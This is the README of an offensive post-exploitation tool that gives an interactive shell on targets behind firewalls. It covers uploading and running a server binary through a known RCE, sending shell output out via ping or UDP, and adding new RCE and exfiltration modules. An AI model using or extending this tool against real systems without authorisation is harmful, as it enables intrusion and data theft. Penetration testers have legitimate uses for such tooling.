# General

The goal of `clshell` (connection-less shell) is to get a comfortable shell on target systems that can't communicate with the attacking machine via TCP. This could be due to a firewall between the two systems that block inbound connection to the target on most ports or completely block outbound TCP connections.

The project is split into two parts:

* Target (server)
	* Allocates a pseudo terminal on the target and connects it to a shell
	* Creates a named pipe and uses it for shell input
	* Exfiltrates shell output via some method that is possible in the specific case
* Attacker (client)
	* Reads shell input on the local machine
	* Uses some known RCE to write the shell input into the named pipe on the server
	* Receives data via the chosen exfiltration method

The project aims to make it easy to define new methods to

* get the command to the shell on the target system (RCE method has to be implemented)
* get the output of the shell back to the attacker machine (data exfiltration method has to be implemented)

# Target Component

The target allocates a new pseudo terminal and connects it to a shell.
It creates a named pipe which is used as shell input. The output is exfiltrated using a method that the system allows, handled in the `send_output` method.

Current exfiltration methods:

* Using `ping` command (TODO)
* Using UDP packets (TODO)

Other possibilities (future work):

* Write shell output to a location reachable from the outside (e.g., a webserver directory)
* Use DNS tunneling

# Usage

Basic usage example with pre-existing input and output methods:

```sh
# Clone repository
git clone https://gitlab.com/opendev0/clshell
cd clshell

# Build Go server binary
cd server
go build
cd ..

# Use client to upload server binary to remote system (using the input method selected in the client/client.py script)
client/client.py upload server/server /dev/shm/server

# Execute server binary on the remote system. Method (e.g., ping) has to match the output method selected in the client/client.py script and start listening for output.
client/client.py run /dev/shm/server ping -ip 127.0.0.1
```

# Extensions

To add a new RCE method to get commands into the named pipe on the server, following code has to be implemented:

* In the file `client/client_impl.py`, write a new class that derives from Input and overwrite the `remote_command` method. Just follow the example of already existing classes.

To add a new exfiltration method to get the shell output to the attacker host, following code has to be implemented:

* In the file `client/client_impl.py`, write a new class that derives from Output and overwrite the `recv_output`, `init_exfil`, and `deinit_exfil` method. Just follow the example of already existing classes.
* In the server Go project, implement the following:
	* `server/args/{module}.go`: Define arguments needed for the module.
	* `server/output/{module}.go`: Define a new type that implements the `OutputHandler` interface
